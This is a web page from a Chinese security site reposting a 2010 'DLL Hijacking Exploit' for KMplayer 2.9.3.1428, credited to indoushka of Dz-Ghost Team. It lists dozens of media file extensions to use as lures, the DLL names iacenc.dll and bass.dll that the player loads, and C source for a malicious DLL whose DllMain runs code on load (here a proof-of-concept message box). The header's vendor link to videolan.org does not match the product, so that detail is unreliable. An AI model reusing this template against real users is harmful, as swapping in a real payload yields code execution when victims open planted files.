首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KMplayer v 2.9.3.1428 DLL Hijacking Exploit
来源:Dz-Ghost Team 作者:indoushka 发布时间:2010-09-28  
########################################################################

# Vendor: http://www.videolan.org

# Date: 2010-07-27

# Author : indoushka

# Thanks to : Dz-Ghost Team

# Contact : 00213771818860

# Tested on : windows SP2 Francais V.(Pnx2 2.0)
########################################################################
                                                                                                                                                                                               
# Exploit By indoushka
-------------
exploit.ape

exploit.3gp

exploit.3gpp

exploit.aac

exploit.apl

exploit.divx

exploit.ac3

exploit.alac

exploit.ape

exploit.amr

exploit.dts

exploit.flac

exploit.flv

exploit.hdmov

exploit.ifo

exploit.m2p

exploit.m2t

exploit.m2ts

exploit.m4a

exploit.m4v

exploit.mka

exploit.mkv

exploit.mov

exploit.mp4

exploit.mp4v

exploit.mpc

exploit.mpls

exploit.mpv4

exploit.mts

exploit.ofr

exploit.ofs

exploit.oga

exploit.ogg

exploit.ogm

exploit.ogv

exploit.ra

exploit.ram

exploit.rm

exploit.rmm

exploit.rmvb

exploit.rp

exploit.rpm

exploit.rt

exploit.rv

exploit.smi

exploit.smil

exploit.tps

exploit.ts

exploit.tta

exploit.vob

exploit.wv
-------------
iacenc.dll

bass.dll
-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opera 10.51 DLL Hijacking Expl
·manycam 2.5.0.68 DLL Hijacking
·VLC 1.0.5 Golden eye DLL Hijac
·Media Player Classic 1.3.1752.
·Fichier Identificateur numriqu
·Microsoft (r) Windows Based Sc
·winstyler (winstyler.exe) DLL
·Microsoft Clip Organizer (11.6
·Acunetix Ltd 2010 Version 6.5
·Microsoft Convertisseur de gro
·linux/x86 setreuid(0,0) and ad
·linux/x86 setreuid(0) and add
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved